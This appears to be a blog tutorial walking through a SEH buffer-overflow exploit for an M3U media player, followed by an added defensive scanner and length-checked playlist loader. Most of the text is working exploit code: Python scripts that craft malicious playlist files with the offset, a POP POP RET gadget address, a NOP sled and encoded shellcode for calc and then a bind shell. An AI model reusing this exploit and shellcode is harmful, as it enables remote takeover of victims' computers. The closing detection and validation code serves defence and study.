#!/usr/bin/python
nama = 'm3ummplayer.m3u'
junk = 'A' * 5000
file = open(nama,'w')
file.write(junk)
print ("sukses ...")
file.close()
But this could not overwrite EIP.
Then I generated the fuzzer file again as a .ppl playlist and loaded that instead, but got the same result: EIP was not overwritten.
So I reduced the buffer to 4500 bytes, and that works:
#!/usr/bin/python
nama = 'm3ummplayer.m3u'
junk = 'A' * 4500
file = open(nama,'w')
file.write(junk)
print ("sukses ...")
file.close()
Then press Shift+F9 to pass the exception on to the application.
We can see that EIP was successfully overwritten by our fuzzer.
Next step: create a 4500-byte cyclic pattern and paste it into our fuzzer.
#!/usr/bin/python
nama = 'm3ummplayer.m3u'
junk="Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8A.......................Fs8Fs9Ft0Ft1Ft2Ft3Ft4Ft5Ft6Ft7Ft8Ft9"
file = open(nama,'w')
file.write(junk)
print ("sukses ...")
file.close()
Then look up the offset of the pattern bytes that landed in the handler (4108 bytes here).
Now try to control EIP:
#!/usr/bin/python
nama = 'm3ummplayer.m3u'
junk="\x90"*4108
buff="\xCC\xCC\xCC\xCC"
buff+="\xDD\xCC\xBB\xAA"
file = open(nama,'w')
file.write(junk+buff)
print ("sukses ...")
file.close()
We can see that the bytes AABBCCDD landed in the SEH handler. Then press Shift+F9 to pass the exception, and the handler address overwrites EIP.
Next, search for a module to use as a stepping stone: one that was not compiled with the SEHandler (SafeSEH) and DllCharacteristics protections.
We can see that the module VBoxMRXNP.dll is not compiled with either.
Open View --> Executable modules and double-click the module VBoxMRXNP.dll.
Then search for the instruction sequence POP r32, POP r32, RETN.
Next step: make the payload. Here I first build a payload that launches calc, to confirm that the chain is correct.
#!/usr/bin/python
nama = 'm3ummplayer.m3u'
junk="\x90"*4108
buff="\xeb\x06\x90\x90"
buff+="\xBA\x01\x01\x10"#100101BA 5E POP ESI
nop="\x90"*32
payload=("\x33\xc9\xdb\xc5\xbb\x98\x0f\xf9\x22\xd9\x74\x24\xf4\x5a\xb1\x23"
"\x83\xc2\x04\x31\x5a\x11\x03\xc2\x1e\x1b\xd7\x0e\xc8\x9f\x18\xee"
"\x09\xab\x5c\xd2\x82\xd7\x5b\x52\x94\xc8\xef\xed\x8e\x9d\xaf\xd1"
"\xaf\x4a\x06\x9a\x84\x07\x98\x72\xd5\xd7\x02\x26\x92\x18\x40\x31"
"\x5a\x52\xa4\x3c\x9e\x88\x43\x05\x4a\x6b\xa8\x0c\x97\xf8\xef\xca"
"\x56\x14\x69\x99\x55\xa1\xfd\xc2\x79\x34\xe9\x77\x9d\xbd\xec\x6c"
"\x17\x9d\xca\x76\xeb\x2f\xd3\x12\x60\x0f\xe3\x5f\xb6\xe8\x0f\xd4"
"\x77\x05\x9b\x9a\x6b\xb8\x10\x32\x9c\x29\x2f\x49\x1c\x1d\x30\x4d"
"\x1d\xd5\x59\x71\x42\xd8\x6f\xe9\x2a\x93\x68\x6a\x12\xd8\xd8\x04"
"\xed\xc7\x3b\xa7\x79\x60\x45\xcd\x74\xc7\x45\x36\xeb\x86\xd5\xdb"
"\xec")
file = open(nama,'w')
file.write(junk+buff+nop+payload)
print ("sukses ...")
file.close()
It works: the calculator appeared.
Now try a bind shell payload:
#!/usr/bin/python
nama = 'm3ummplayer.m3u'
junk="\x90"*4108
buff="\xeb\x06\x90\x90"
buff+="\xBA\x01\x01\x10"#100101BA 5E POP ESI
nop="\x90"*32
payload=("\xbe\xed\xb7\xbe\x26\x29\xc9\xb1\x51\xd9\xcb\xd9\x74\x24\xf4\x58"
"\x31\x70\x0e\x83\xe8\xfc\x03\x9d\xbd\x5c\xd3\xa1\xa8\x4b\x51\xb1"
"\xd4\x73\x95\xbe\x47\x07\x06\x64\xac\x9c\x92\x58\x27\xde\x19\xd8"
"\x36\xf0\xa9\x57\x21\x85\xf1\x47\x50\x72\x44\x0c\x66\x0f\x56\xfc"
"\xb6\xcf\xc0\xac\x3d\x0f\x86\xab\xfc\x5a\x6a\xb2\x3c\xb1\x81\x8f"
"\x94\x62\x42\x9a\xf1\xe0\xcd\x40\xfb\x1d\x97\x03\xf7\xaa\xd3\x4c"
"\x14\x2c\x0f\x71\x08\xa5\x46\x19\x74\xa5\x39\x22\x45\x0e\xdd\x2f"
"\xe5\x80\x95\x6f\xe6\x6b\xd9\x73\x5b\xe0\x5a\x83\xfd\x9f\xd4\xdd"
"\x0f\x8c\xb9\x1e\xd9\x2a\x69\x86\x8e\x81\xbf\x2e\x38\x95\x8d\xf1"
"\x92\xa6\x22\x65\xd0\xb4\x3f\x4e\xb6\xb9\x16\xef\xbf\xa3\xf1\x8e"
"\x2d\x23\xfc\xc5\xc7\x36\xff\x35\x7f\xee\xf6\x40\x2d\x47\xf6\x7c"
"\x7d\x3b\x5b\xd3\xd1\xf8\x08\x90\x86\x01\x7e\x70\x41\xef\x23\x1a"
"\xc2\x86\x3d\x77\x8c\x3c\xa7\x07\x8a\x6a\x27\x31\x7e\x85\x86\xe8"
"\x80\x75\x40\xb6\xd2\x58\x78\xe1\xd3\x73\x29\x58\xd3\xac\xa6\x87"
"\x62\xcb\x7e\x10\x8a\x05\xd0\xca\x20\xff\x2e\x22\x5b\x97\x37\xbb"
"\x9a\x11\xef\xc4\xf5\xb7\xf0\xea\x9c\x5d\x6b\x6c\x09\xc1\x1e\xf9"
"\x2c\x6f\xb1\xa0\x87\xbc\xb8\xb5\xb2\x78\x32\xdb\x72\x41\xb7\xb1"
"\x8b\x03\x15\x3b\x31\xa8\xf6\x4e\xcc\x88\x53\xfb\x9a\x81\xd1\x05"
"\x6f\x47\xe9\x8c\xd4\x97\xc3\x35\x82\x35\xbd\x98\x7d\xd0\x3c\x4b"
"\x2f\x71\x6e\x94\x1f\x11\x3d\xb3\xa5\x2c\x6e\xbc\x70\xda\x6e\xbd"
"\x4a\xe4\x41\xca\xe2\xe6\xe1\x08\x68\xe8\x30\xc2\x8e\xc6\xd5\x9c"
"\xa8\x05\x56\x33\xb6\x1c\x66\x63")
file = open(nama,'w')
file.write(junk+buff+nop+payload)
print ("sukses ...")
file.close()
Alhamdulillah... :D
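The other side of what this post shows is the check the player was missing. The following is an added example, not code from the post or from the player's developers: a scanner that flags playlist files shaped like the fuzzer and exploit files above (a single entry of thousands of bytes, runs of 0x90, non-text bytes), and a length-checked loader that rejects such an entry before it can reach a fixed-size buffer. The limits MAX_ENTRY_LEN and MAX_FILE_LEN and the sample playlists are constructed assumptions for the example.

```python
import re

# Limits assumed for this example (not from the post or the player):
# a playlist entry is a path or URL, so Windows MAX_PATH is a generous cap,
# while the crash in the post needs a single entry of 4500 bytes.
MAX_ENTRY_LEN = 260
MAX_FILE_LEN = 1024 * 1024


def _entries(data):
    """Yield (line_no, line) for the non-comment lines of a raw .m3u file."""
    for line_no, raw in enumerate(data.split(b"\n"), start=1):
        line = raw.rstrip(b"\r")
        if line and not line.startswith(b"#"):   # skip #EXTM3U / #EXTINF
            yield line_no, line


def scan_m3u(data, max_entry_len=MAX_ENTRY_LEN):
    """Flag playlist content that looks like the overflow files in the post.

    Returns a list of (line_no, reason) tuples; an empty list means nothing
    suspicious was found. Line 0 is used for whole-file findings.
    """
    findings = []
    if len(data) > MAX_FILE_LEN:
        findings.append((0, "playlist larger than %d bytes" % MAX_FILE_LEN))
    for line_no, line in _entries(data):
        if len(line) > max_entry_len:
            findings.append((line_no, "entry length %d exceeds %d"
                             % (len(line), max_entry_len)))
        # Paths and URLs are text: reject control bytes and invalid UTF-8.
        if re.search(rb"[\x00-\x08\x0b\x0c\x0e-\x1f\x7f]", line):
            findings.append((line_no, "control bytes in entry"))
        try:
            line.decode("utf-8")
        except UnicodeDecodeError:
            findings.append((line_no, "entry is not valid UTF-8 text"))
        if b"\x90" * 16 in line:
            findings.append((line_no, "run of 0x90 bytes (NOP-sled-like)"))
        if re.search(rb"(.)\1{999}", line, re.DOTALL):
            findings.append((line_no, "1000+ repeated bytes (fuzzer-like padding)"))
    return findings


def load_playlist(data, max_entry_len=MAX_ENTRY_LEN):
    """Length-checked loader: the check the vulnerable player lacked.

    Every entry is validated before it is stored, and an oversized entry
    raises instead of being copied into a fixed-size buffer or truncated.
    """
    entries = []
    for line_no, line in _entries(data):
        if len(line) > max_entry_len:
            raise ValueError("line %d: entry of %d bytes exceeds limit %d"
                             % (line_no, len(line), max_entry_len))
        entries.append(line.decode("utf-8"))
    return entries


# Constructed sample inputs: a normal playlist, the post's 4500-byte fuzzer
# file, and a file with the shape of the final one (NOP sled plus filler
# standing in for the shellcode).
BENIGN = (b"#EXTM3U\r\n#EXTINF:123,Song\r\nC:\\Music\\song.mp3\r\n"
          b"http://example.invalid/stream.mp3\r\n")
OVERSIZED = b"A" * 4500
SLED = b"\x90" * 4108 + b"\xcc" * 8

if __name__ == "__main__":
    for name, sample in (("benign", BENIGN), ("oversized", OVERSIZED), ("sled", SLED)):
        print(name, scan_m3u(sample))
    print(load_playlist(BENIGN))
```

The length check in load_playlist is the actual fix for this bug class; scan_m3u is the detection side, usable on a mail gateway or a sample triage box to spot playlist files built the way this post builds them.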